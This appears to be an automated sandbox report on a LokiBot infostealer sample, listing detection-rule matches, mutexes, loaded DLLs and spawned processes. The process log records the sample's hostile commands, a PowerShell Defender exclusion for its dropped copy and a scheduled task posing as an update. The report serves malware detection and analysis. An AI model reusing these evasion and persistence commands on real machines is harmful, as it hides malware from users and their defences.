Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.LEmJJ87mUQ.exe.4249108.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.LEmJJ87mUQ.exe.4249108.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.LEmJJ87mUQ.exe.4249108.3.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.LEmJJ87mUQ.exe.4249108.3.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: LEmJJ87mUQ.exe PID: 5016, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 2568, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: aWBoUwiux.exe PID: 5572, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: LEmJJ87mUQ.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: aWBoUwiux.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, L8Zd5QMXQQ43AtbYpO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, s2abX12Byym4oB7iuy.cs	Security API names: _0020.SetAccessControl
Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, s2abX12Byym4oB7iuy.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, s2abX12Byym4oB7iuy.cs	Security API names: _0020.AddAccessRule
Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, L8Zd5QMXQQ43AtbYpO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, s2abX12Byym4oB7iuy.cs	Security API names: _0020.SetAccessControl
Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, s2abX12Byym4oB7iuy.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, s2abX12Byym4oB7iuy.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@18/16@1/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

8_2_0040650A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

8_2_0040434D

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe

File created: C:\Users\user\AppData\Roaming\aWBoUwiux.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5572
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5444:120:WilError_03
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Mutant created: \Sessions\1\BaseNamedObjects\qaGvzjJwXCfFEpcoT
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3788:120:WilError_03

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe

File created: C:\Users\user\AppData\Local\Temp\tmpE3D.tmp

Jump to behavior

Source: LEmJJ87mUQ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: LEmJJ87mUQ.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: LEmJJ87mUQ.exe

ReversingLabs: Detection: 55%

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe

File read: C:\Users\user\Desktop\LEmJJ87mUQ.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\LEmJJ87mUQ.exe "C:\Users\user\Desktop\LEmJJ87mUQ.exe"
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmpE3D.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\aWBoUwiux.exe C:\Users\user\AppData\Roaming\aWBoUwiux.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmp33C7.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 1788
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe"	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmpE3D.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmp33C7.tmp"	Jump to behavior

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
